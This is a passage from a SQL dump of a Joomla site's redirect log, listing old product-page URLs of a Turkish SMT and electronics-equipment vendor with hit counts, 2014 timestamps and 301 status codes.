14:06:31','0000-00-00 00:00:00',301),(572,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=93&Itemid=104&lang=tr','','','',29,0,'2014-08-04 14:14:23','0000-00-00 00:00:00',301),(573,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en&limitstart=10','','','',70,0,'2014-08-04 14:16:16','0000-00-00 00:00:00',301),(574,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=112&Itemid=123&lang=en','','','',30,0,'2014-08-04 14:22:09','0000-00-00 00:00:00',301),(575,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=156&Itemid=157&lang=tr','','','',11,0,'2014-08-04 14:28:01','0000-00-00 00:00:00',301),(576,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=en','','','',2,0,'2014-08-04 14:30:00','0000-00-00 00:00:00',301),(577,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119&Itemid=117&lang=en','','','',3,0,'2014-08-04 14:31:03','0000-00-00 00:00:00',301),(578,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=90&Itemid=102&lang=en','','','',27,0,'2014-08-04 14:34:01','0000-00-00 00:00:00',301),(579,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=en','','','',7,0,'2014-08-04 14:39:55','0000-00-00 00:00:00',301),(580,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=tr','','','',2,0,'2014-08-04 14:41:54','0000-00-00 00:00:00',301),(581,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=tr','','','',4,0,'2014-08-04 14:43:55','0000-00-00 00:00:00',301),(582,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=tr','','','',5,0,'2014-08-04 14:45:55','0000-00-00 00:00:00',301),(583,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=tr','','','',13,0,'2014-08-04 14:47:54','0000-00-00 00:00:00',301),(584,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146&Itemid=148&lang=en','','','',3,0,'2014-08-04 14:51:03','0000-00-00 00:00:00',301),(585,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=109&Itemid=120&lang=en','','','',2,0,'2014-08-04 14:51:41','0000-00-00 00:00:00',301),(586,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=tr','','','',12,0,'2014-08-04 14:55:47','0000-00-00 00:00:00',301),(587,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=en','','','',12,0,'2014-08-04 15:01:46','0000-00-00 00:00:00',301),(588,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=99&Itemid=43&lang=tr','','','',2,0,'2014-08-04 15:02:47','0000-00-00 00:00:00',301),(589,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=en','','','',15,0,'2014-08-04 15:06:41','0000-00-00 00:00:00',301),(590,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=tr','','','',3,0,'2014-08-04 15:08:45','0000-00-00 00:00:00',301),(591,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=tr','','','',6,0,'2014-08-04 15:10:45','0000-00-00 00:00:00',301),(592,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=97&Itemid=108&lang=tr','','','',11,0,'2014-08-04 15:12:44','0000-00-00 00:00:00',301),(593,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115&Itemid=126&lang=en','','','',5,0,'2014-08-04 15:14:18','0000-00-00 00:00:00',301),(594,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=97&Itemid=108&lang=tr','','','',1,0,'2014-08-04 15:14:46','0000-00-00 00:00:00',301),(595,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=59&Itemid=155&lang=en','','','',1,0,'2014-08-04 15:17:02','0000-00-00 00:00:00',301),(596,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=tr','','','',3,0,'2014-08-04 15:18:50','0000-00-00 00:00:00',301),(597,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=tr','','','',5,0,'2014-08-04 15:20:51','0000-00-00 00:00:00',301),(598,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=en','','','',8,0,'2014-08-04 15:24:24','0000-00-00 00:00:00',301),(599,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&Itemid=130&lang=tr','','','',4,0,'2014-08-04 15:27:43','0000-00-00 00:00:00',301),(600,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=en','','','',2,0,'2014-08-04 15:42:52','0000-00-00 00:00:00',301),(601,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=en','','','',14,0,'2014-08-04 15:48:53','0000-00-00 00:00:00',301),(602,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=tr','','','',1,0,'2014-08-04 15:51:03','0000-00-00 00:00:00',301),(603,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=58&Itemid=149&lang=tr','','','',8,0,'2014-08-04 16:00:00','0000-00-00 00:00:00',301),(604,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=en','','','',2,0,'2014-08-04 16:00:03','0000-00-00 00:00:00',301),(605,'http://www.3s-technologies.com.tr/index.php/tr/kart-temizlemesi','','','',14,0,'2014-08-04 16:09:05','0000-00-00 00:00:00',301),(606,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=116&Itemid=127&lang=en','','','',19,0,'2014-08-04 16:09:53','0000-00-00 00:00:00',301),(607,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en','','','',8,0,'2014-08-04 16:10:49','0000-00-00 00:00:00',301),(608,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=37&lang=tr','','','',3,0,'2014-08-04 16:12:22','0000-00-00 00:00:00',301),(609,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152&Itemid=153&lang=tr','','','',4,0,'2014-08-04 16:14:23','0000-00-00 00:00:00',301),(610,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=138&Itemid=140&lang=tr','','','',4,0,'2014-08-04 16:16:03','0000-00-00 00:00:00',301),(611,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=tr','','','',1,0,'2014-08-04 16:16:09','0000-00-00 00:00:00',301),(612,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=tr','','','',2,0,'2014-08-04 16:29:29','0000-00-00 00:00:00',301),(613,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=167&Itemid=163&lang=en','','','',2,0,'2014-08-04 16:39:22','0000-00-00 00:00:00',301),(614,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=tr','','','',66,0,'2014-08-04 16:44:21','0000-00-00 00:00:00',301),(615,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146&Itemid=148&lang=tr','','','',2,0,'2014-08-04 16:52:55','0000-00-00 00:00:00',301),(616,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en','','','',2,0,'2014-08-04 16:56:19','0000-00-00 00:00:00',301),(617,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=en','','','',56,0,'2014-08-04 16:57:27','0000-00-00 00:00:00',301),(618,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=tr','','','',2,0,'2014-08-04 16:59:58','0000-00-00 00:00:00',301),(619,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=en','','','',2,0,'2014-08-04 17:00:35','0000-00-00 00:00:00',301),(620,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=tr','','','',1,0,'2014-08-04 17:02:29','0000-00-00 00:00:00',301),(621,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=tr','','','',5,0,'2014-08-04 17:02:31','0000-00-00 00:00:00',301),(622,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/tr/?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=tr','','','',2,0,'2014-08-04 17:02:59','0000-00-00 00:00:00',301),(623,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=en','','','',60,0,'2014-08-04 17:03:41','0000-00-00 00:00:00',301),(624,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=en','','','',62,0,'2014-08-04 17:04:03','0000-00-00 00:00:00',301),(625,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=tr','','','',55,0,'2014-08-04 17:04:07','0000-00-00 00:00:00',301),(626,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=en','','','',67,0,'2014-08-04 17:04:48','0000-00-00 00:00:00',301),(627,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=en','','','',56,0,'2014-08-04 17:05:05','0000-00-00 00:00:00',301),(628,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=tr','','','',65,0,'2014-08-04 17:05:40','0000-00-00 00:00:00',301),(629,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=en','','','',76,0,'2014-08-04 17:06:11','0000-00-00 00:00:00',301),(630,'http://www.3s-technologies.com.tr/index.php/tr/lehimleme-hakk-nda','','','',15,0,'2014-08-04 17:06:33','0000-00-00 00:00:00',301),(631,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=tr','','','',8,0,'2014-08-04 17:06:43','0000-00-00 00:00:00',301),(632,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=113&Itemid=125&lang=tr','','','',9,0,'2014-08-04 17:08:42','0000-00-00 00:00:00',301),(633,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=85:neocut&catid=51:neo&Itemid=97&lang=tr','','','',11,0,'2014-08-04 17:09:06','0000-00-00 00:00:00',301),(634,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=133&lang=en','','','',6,0,'2014-08-04 17:10:23','0000-00-00 00:00:00',301),(635,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=166&Itemid=144&lang=tr','','','',35,0,'2014-08-04 17:12:52','0000-00-00 00:00:00',301),(636,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=107&Itemid=118&lang=tr','','','',10,0,'2014-08-04 17:13:22','0000-00-00 00:00:00',301),(637,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr','','','',14,0,'2014-08-04 17:13:37','0000-00-00 00:00:00',301),(638,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125','','','',9,0,'2014-08-04 17:14:24','0000-00-00 00:00:00',301),(639,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=en','','','',7,0,'2014-08-04 17:15:10','0000-00-00 00:00:00',301),(640,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=tr','','','',3,0,'2014-08-04 17:15:19','0000-00-00 00:00:00',301),(641,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=57&Itemid=145&lang=tr','','','',28,0,'2014-08-04 17:15:19','0000-00-00 00:00:00',301),(642,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=tr','','','',69,0,'2014-08-04 17:15:28','0000-00-00 00:00:00',301),(643,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=88&Itemid=100&lang=en','','','',27,0,'2014-08-04 17:15:31','0000-00-00 00:00:00',301),(644,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=tr','','','',73,0,'2014-08-04 17:16:01','0000-00-00 00:00:00',301),(645,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=107&Itemid=118&lang=en','','','',1,0,'2014-08-04 17:16:29','0000-00-00 00:00:00',301),(646,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=72&Itemid=78&lang=en','','','',30,0,'2014-08-04 17:16:42','0000-00-00 00:00:00',301),(647,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en','','','',1,0,'2014-08-04 17:16:59','0000-00-00 00:00:00',301),(648,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=108&Itemid=119&lang=en','','','',18,0,'2014-08-04 17:17:18','0000-00-00 00:00:00',301),(649,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=107&Itemid=118&lang=en','','','',31,0,'2014-08-04 17:17:46','0000-00-00 00:00:00',301),(650,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=tr','','','',6,0,'2014-08-04 17:17:57','0000-00-00 00:00:00',301),(651,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=tr','','','',2,0,'2014-08-04 17:18:03','0000-00-00 00:00:00',301),(652,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=tr','','','',22,0,'2014-08-04 17:18:09','0000-00-00 00:00:00',301),(653,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr','','','',3,0,'2014-08-04 17:18:14','0000-00-00 00:00:00',301),(654,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=tr','','','',20,0,'2014-08-04 17:18:16','0000-00-00 00:00:00',301),(655,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=en','','','',6,0,'2014-08-04 17:18:24','0000-00-00 00:00:00',301),(656,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=53&Itemid=110&lang=tr','','','',1,0,'2014-08-04 17:18:28','0000-00-00 00:00:00',301),(657,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=tr','','','',80,0,'2014-08-04 17:18:38','0000-00-00 00:00:00',301),(658,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=en','','','',12,0,'2014-08-04 17:18:40','0000-00-00 00:00:00',301),(659,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=tr','','','',10,0,'2014-08-04 17:18:44','0000-00-00 00:00:00',301),(660,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=tr','','','',2,0,'2014-08-04 17:18:48','0000-00-00 00:00:00',301),(661,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=46&Itemid=62&lang=tr','','','',2,0,'2014-08-04 17:18:53','0000-00-00 00:00:00',301),(662,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=tr','','','',16,0,'2014-08-04 17:18:58','0000-00-00 00:00:00',301),(663,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=153&Itemid=154&lang=tr','','','',2,0,'2014-08-04 17:19:03','0000-00-00 00:00:00',301),(664,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=tr','','','',3,0,'2014-08-04 17:19:09','0000-00-00 00:00:00',301),(665,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=tr','','','',79,0,'2014-08-04 17:19:18','0000-00-00 00:00:00',301),(666,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=tr','','','',3,0,'2014-08-04 17:19:29','0000-00-00 00:00:00',301),(667,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=140&Itemid=142&lang=tr','','','',8,0,'2014-08-04 17:19:34','0000-00-00 00:00:00',301),(668,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=137&Itemid=139&lang=tr','','','',2,0,'2014-08-04 17:19:47','0000-00-00 00:00:00',301),(669,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=158&Itemid=159&lang=tr','','','',24,0,'2014-08-04 17:20:07','0000-00-00 00:00:00',301),(670,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=158&Itemid=159&lang=tr','','','',24,0,'2014-08-04 17:20:14','0000-00-00 00:00:00',301),(671,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=en','','','',19,0,'2014-08-04 17:20:17','0000-00-00 00:00:00',301),(672,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=158&Itemid=159&lang=tr','','','',2,0,'2014-08-04 17:20:25','0000-00-00 00:00:00',301),(673,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=en','','','',15,0,'2014-08-04 17:20:29','0000-00-00 00:00:00',301),(674,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=124&Itemid=130&lang=tr','','','',24,0,'2014-08-04 17:20:32','0000-00-00 00:00:00',301),(675,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=62&lang=en','','','',1,0,'2014-08-04 17:21:08','0000-00-00 00:00:00',301),(676,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=120&Itemid=116&lang=tr','','','',1,0,'2014-08-04 17:21:14','0000-00-00 00:00:00',301),(677,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=49&Itemid=61&lang=tr','','','',24,0,'2014-08-04 17:21:17','0000-00-00 00:00:00',301),(678,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=49&Itemid=61&lang=tr','','','',31,0,'2014-08-04 17:21:22','0000-00-00 00:00:00',301),(679,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=49&Itemid=61&lang=tr','','','',1,0,'2014-08-04 17:21:26','0000-00-00 00:00:00',301),(680,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=tr','','','',1,0,'2014-08-04 17:21:34','0000-00-00 00:00:00',301),(681,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=93&Itemid=104&lang=en','','','',27,0,'2014-08-04 17:21:54','0000-00-00 00:00:00',301),(682,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=tr','','','',3,0,'2014-08-04 17:22:02','0000-00-00 00:00:00',301),(683,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=139&Itemid=141&lang=tr','','','',3,0,'2014-08-04 17:22:22','0000-00-00 00:00:00',301),(684,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=tr','','','',2,0,'2014-08-04 17:22:26','0000-00-00 00:00:00',301),(685,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=94&Itemid=105&lang=en','','','',7,0,'2014-08-04 17:22:44','0000-00-00 00:00:00',301),(686,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=94&Itemid=105&lang=en','','','',1,0,'2014-08-04 17:22:49','0000-00-00 00:00:00',301),(687,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=tr','','','',1,0,'2014-08-04 17:22:57','0000-00-00 00:00:00',301),(688,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=en','','','',65,0,'2014-08-04 17:22:59','0000-00-00 00:00:00',301),(689,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=tr','','','',2,0,'2014-08-04 17:23:05','0000-00-00 00:00:00',301),(690,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=tr','','','',4,0,'2014-08-04 17:23:09','0000-00-00 00:00:00',301),(691,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=en','','','',12,0,'2014-08-04 17:23:12','0000-00-00 00:00:00',301),(692,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=en','','','',9,0,'2014-08-04 17:23:18','0000-00-00 00:00:00',301),(693,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=en','','','',1,0,'2014-08-04 17:23:23','0000-00-00 00:00:00',301),(694,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=117&Itemid=128&lang=en','','','',31,0,'2014-08-04 17:23:30','0000-00-00 00:00:00',301),(695,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=89&Itemid=101&lang=tr','','','',2,0,'2014-08-04 17:23:35','0000-00-00 00:00:00',301),(696,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=en','','','',11,0,'2014-08-04 17:23:38','0000-00-00 00:00:00',301),(697,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=59&Itemid=155&lang=tr','','','',31,0,'2014-08-04 17:23:44','0000-00-00 00:00:00',301),(698,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=55&Itemid=1&lang=tr','','','',4,0,'2014-08-04 17:23:47','0000-00-00 00:00:00',301),(699,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=55&Itemid=1&lang=tr','','','',1,0,'2014-08-04 17:23:52','0000-00-00 00:00:00',301),(700,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=tr','','','',3,0,'2014-08-04 17:23:58','0000-00-00 00:00:00',301),(701,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=en','','','',16,0,'2014-08-04 17:24:04','0000-00-00 00:00:00',301),(702,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=55&Itemid=1&lang=tr','','','',1,0,'2014-08-04 17:24:09','0000-00-00 00:00:00',301),(703,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=85:neocut&catid=51:neo&Itemid=97&lang=tr','','','',4,0,'2014-08-04 17:24:13','0000-00-00 00:00:00',301),(704,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=tr','','','',19,0,'2014-08-04 17:24:16','0000-00-00 00:00:00',301),(705,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=116&Itemid=127&lang=tr','','','',12,0,'2014-08-04 17:24:19','0000-00-00 00:00:00',301),(706,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=58&Itemid=149&lang=en','','','',16,0,'2014-08-04 17:24:29','0000-00-00 00:00:00',301),(707,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=en','','','',7,0,'2014-08-04 17:24:35','0000-00-00 00:00:00',301),(708,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=138&Itemid=140&lang=en','','','',8,0,'2014-08-04 17:24:43','0000-00-00 00:00:00',301),(709,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=46&Itemid=62&lang=tr','','','',36,0,'2014-08-04 17:24:44','0000-00-00 00:00:00',301),(710,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=138&Itemid=140&lang=en','','','',24,0,'2014-08-04 17:24:48','0000-00-00 00:00:00',301),(711,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=138&Itemid=140&lang=en','','','',1,0,'2014-08-04 17:24:52','0000-00-00 00:00:00',301),(712,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr','','','',87,0,'2014-08-04 17:24:56','0000-00-00 00:00:00',301),(713,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=en','','','',25,0,'2014-08-04 17:25:01','0000-00-00 00:00:00',301),(714,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=tr','','','',59,0,'2014-08-04 17:25:07','0000-00-00 00:00:00',301),(715,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=122&Itemid=129&lang=tr','','','',3,0,'2014-08-04 17:25:10','0000-00-00 00:00:00',301),(716,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=122&Itemid=129&lang=tr','','','',17,0,'2014-08-04 17:25:14','0000-00-00 00:00:00',301),(717,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=82&Itemid=38&lang=en','','','',13,0,'2014-08-04 17:25:38','0000-00-00 00:00:00',301),(718,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=146&Itemid=148&lang=en','','','',25,0,'2014-08-04 17:25:52','0000-00-00 00:00:00',301),(719,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=125&Itemid=131&lang=tr','','','',35,0,'2014-08-04 17:26:01','0000-00-00 00:00:00',301),(720,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=93&Itemid=104&lang=tr','','','',31,0,'2014-08-04 17:26:07','0000-00-00 00:00:00',301),(721,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=en','','','',62,0,'2014-08-04 17:26:16','0000-00-00 